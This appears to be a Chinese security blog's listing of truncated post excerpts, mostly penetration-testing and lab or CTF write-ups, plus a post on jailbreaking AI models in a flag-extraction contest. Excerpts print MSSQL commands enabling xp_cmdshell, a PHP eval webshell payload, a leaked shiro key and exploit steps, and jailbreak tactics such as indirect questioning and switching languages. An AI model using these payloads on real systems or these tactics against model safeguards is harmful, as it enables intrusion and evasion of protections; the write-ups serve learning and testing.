某知名大型企业渗透随笔
# 简介
这几天也是进行了一周左右的高强度渗透测试,也是挖出了十多个高危漏洞,下面分享几个有趣的案例,记录一下。
# 案例
# 一、某 CMS 系统 RCE
首先发现该 CMS 有一个自定义报表管理功能,可以执行一些正常的 Mssql 查询语句。然后我就想着尝试了 xp_cmdshell 函数,发现没法执行报错了。然后我就猜想 xp_cmdshell 函数没有开启,我就直接用了以下命令尝试开启:
execute('sp_configure "show advanced options",1')
execute('reconfigure')
execute('sp_configure "xp_cmdshell", 1')
execute('reconfigure')
execute('sp_configure')
execute('xp_cmdshell "whoam ...
CyberStrikeLab PT-1
考点:seacms rce ,msfvemon 木马,getsystem 权限提升,hashdump/load kiwi+creds_all
# seacms
首先得知是 seacms,但不知道什么版本
# seacms 版本
访问 /data/admin/ver.txt 目录,得到 seacms 版本 v12.9
直接网上搜索版本历史漏洞
参考:https://blog.csdn.net/holyxp/article/details/140734295
直接尝试找后台路径
/cslab/
接着猜出账号密码 cslab:cslab
# seacms rce
在会员消息通知界面可以插入木马命令执行
参考上面博客,在第一行插入一下语句,点击保存即可
1";@eval($_POST[cmd]);;//
系统为 windows
# 蚁剑
注意蚁剑木马连接路径为
http://10.0.0.68/data/admin/notify.php
别用以下路径连接,连不上,但是可以命令执行
http://10.0.0.68/cslab/admin_notify.php
# ...
AI大模型挑战赛
# 前言
长亭最近举办了一场 AI 大模型挑战赛,其中有 3 个大模型,5 道题目。目的是对话 ai,利用你能想到的方法让 ai 给出其真实的 flag。感觉非常有趣,就报名参加了,从上午 10 点一直写到晚上 7 点,也是 ak 了 ai 大模型。
# 白话
具体内容就不说太仔细了,题目分为:最强大脑 (1)、守护者三兄弟 (2-4) 和神秘模型 (5),难度依次递增。
# 最强大脑
随便问一下相关内容就能出来 flag,也是拿了个 2 血。
# 守护者三兄弟
v3 反而是我最先写出来的,通过询问敏感信息的限制条件出来了,拿了个 3 血。其他两兄弟就正常写了,通过话术还是能出来的。
# 神秘模型
这个是最难的,分数是其他模型的好几倍,我也是写很久。该模型主要会通过一个一个分支来判断你的问题,比如涉及到敏感字符就 false,没有就进下一个分支判断。通过长时间尝试,也是摸清了 ai 的判断机制,从而获得了 flag。悄悄说一下,是通过某个语言获得的。
# 话术
这里简单题几个思路
1、直接强行问 flag 相关的,不能太直接,要绕一下
2、给出问题让 AI 填补 (强制形状)
3 ...
某金融众测感受
# 前言
这周挖了一星期的金融众测,挖的脑壳痛,因为我是挖的最后一轮众测,漏洞差不多都被提交完了,只能咬着头皮一个一个网站的看,而且关了很多站了,资产少得可怜。
# 实战
第一天直接从比较薄弱的小程序入手,纯纯没啥收获,记得看了很多,做了很多工作,结果空空如也。红队大哥也没挖出啥好东西,只能甩 0day 搞点漏洞。
第二三天直接从网站入手,解析了很多网站,硬是一个一个点开看的,而且一些站点已经关闭了,不论是扫描还是到处点击功能点,查看接口,js 等等,都没有发现啥东西。
第四天开始从 app 入手了,直接反编译之后发现了一些接口,发现一些密码写死,不过好像是测试账户,又发现了一些 cer 泄露,最重要的是 app 可重打包,但是可能是写入版本为 31,要加 v2 签名,没搞好。安装失败。还进行了一些源码审计,发现大部分是 private,没法利用。继续审计,终于发现了一处接口,任意用户查询,只要知道用户名就能输出该用户敏感信息,构造这数据包挺复杂的,花了我老一会时间分析。我都不敢叫它 0day。
第五天继续代码审计,实在没有啥利用点了,还有其它大佬一起审计,也是审出了其他的东西。快点的 ...
学习记录2024.12.30-2025.1.3
# 精华
我是从 2024 年 10 月 16 日入职长亭,在华东安服组实习,为什么在 2025 年 1 月 2 日才开始写总结呢?因为之前忘了,而且自己也挺懒,感觉自己挺小丑的,现在写还不算晚,现在来写一下这周的所学所感。
# 学习目录
1、渗透、漏洞挖掘知识的学习
2、钓鱼技术的学习
3、新版 cs 的问题解决
4、代码审计的学习
# 学习内容
# 渗透、漏洞挖掘知识的学习
在这方面的学习,主要是多刷刷博客,文章等等,还有和长亭师傅们的学习。
我翻了翻之前保存的文章,红队小技巧
# 信息搜集方面提升:
# CMS
首先不管是漏洞挖掘还是拿 shell,清楚的知道目标对应的 cms 还是很重要的,能帮助你直接搜索对应的漏洞,或者是源码来审计等等
1、通过工具来搜集
All-Finger (学长自己写的工具 - 推荐) 感觉挺好用的
下载链接:
https://github.com/eexp/All-Finger
云悉指纹,好用
https://www.yunsee.cn/
2、wapplayzer 插件
3、fofa,hunter 等搜索引擎
4、网站后台,网页最后的 ...
APP渗透基础
# 前言
由于最近进行了很多 APP 渗透测试,也是学习到了很多,现将所学结合其他师傅的博客内容一起来写记录一下
参考连接:
https://blog.csdn.net/qq_42067124/article/details/129803628
# 利用工具:
1、夜神模拟器
2、drozer
3、HijackAPP
4、apk_tool
5、AndroidKiller_v1.3.1
6、adb
# 利用步骤
# 连接夜神模拟器
adb connect 127.0.0.1:62001
除了模拟器还能用手机安装drozer进行连接,模拟器抓包有时会被封号,而且很多功能并不能像手机一样使用,可能连APP都打不开,手机进行连接可打开开发者模式,然后可选择WiFi连接或USB连接,经过实验,WiFi很可能连不上,建议拿一根数据线进行USB连接。
# 端口转发
adb forward tcp:31415 tcp:31415
# 连接
drozer.bat console connect
# 列出包
run app.package.list
# 查看攻击面
run app.packag ...
春秋云镜 Delegation
# cve-2021-42643 (写马)
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.145.25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Acc ...
春秋云镜 Hospital
# 考点
Spring boot actuator unauthorized access
shiro 反序列化 RCE
vim.basic 提权
Nacos SnakeYaml 反序列化
Fastjson
Grafana 任意文件读漏洞
psql
# Web1
# fscan
首先 fscan 开扫
fscan.exe -h 39.99.233.124
发现两个端口,和 springboot heapdump 泄露
### springboot
利用 springboot 利用工具扫描
发现有 actuator 泄露,访问 heapdump,发现可以下载
利用发现的好工具解密,发现密钥,
shiro key:GAYysgMQhG7/CzIJlVpR2g==
# shiro
因为看出来是 shiro,所以得到 key 了直接解密
利用 shiro 综合利用工具写马
尝试哥斯拉连接,没连上,不知道为什么,连接冰蝎吧,连接成功
最后终于连接成功,反弹 shell
连接 vshell,老方法,然后打开客户的管理
尝试读取 flag,发现没权限,用命令查找 root ...
红日靶场07
# 前言
同一个实验室的朋友师傅打好了靶场环境,属实舒服的,直接蹭车!从 10 月 3 号打到了 10 月 5 号,打的酣畅淋漓。还是学到了很多。
# fscan
1、首先拿 fscan 开扫,发现 redis 和 laravel 的 cve
# laravel
2、我直接选择打 laravel
https://github.com/joshuavanderpoll/CVE-2021-3129.git (拿 flag)
https://github.com/ajisai-babu/CVE-2021-3129-exp (拿 shell)
我用的第二个,直接写马,可以正常访问,链接蚁剑
python CVE-2021-3129.py -u http://192.168.1.102:81/ --e
# vshell
3、准备上线 vshell,用了命令和传文件都不行,原来是不出网
# redis
再尝试另一种方法,redis 未授权访问
尝试了几种方法,发现写马,定时任务,主从复制都不行,只能写公钥
参考:
https://blog.csdn.net/q20010619/articl ...
JavaFX开发总结
# 前言
本人在国庆期间突发奇想,看到 Github 上各种大佬的工具,被秀的头皮发麻,全都写得很好,我无论在日常学习还是工作上,工具基本上都会用到,所以就很渴望有一个自己的工具来帮助渗透。然后就从较为简单的工具开始。那到底用什么语言来写呢?发现 java 又能启动 GUI 界面,启动又方便,直接 java -jar 就可以启动。那就决定了,直接开写。
# 前期
前期不知道怎么入手,就在网上搜索了用 java 图形化工具如何开发,最初发现了 Java Swing,就一直在研究这玩意,后来发现比较拉,然后又发现了 JavaFX,对比起来完全不一样,以上是个人观点。然后就聚焦于 JavaFX 了。
# 中期
这个阶段还在探寻代码之美,因为对于工具的具体框架不清楚,具体功能不太熟悉,只能将师傅们的工具反编译来助我欣赏,果然别有一番天地,原来是这样,我大概了解了工具的大致框架和内容要如何去写了,下面就是加入我自己的想法和设计。最令我头疼的是 fxml 文件的编写,对于功能太多了。
# 后期
这阶段我整体代码部分已经差不多了,就只是在本地测试测试,调一下,发现速度不对,线程加一下。就在我很开心的 ...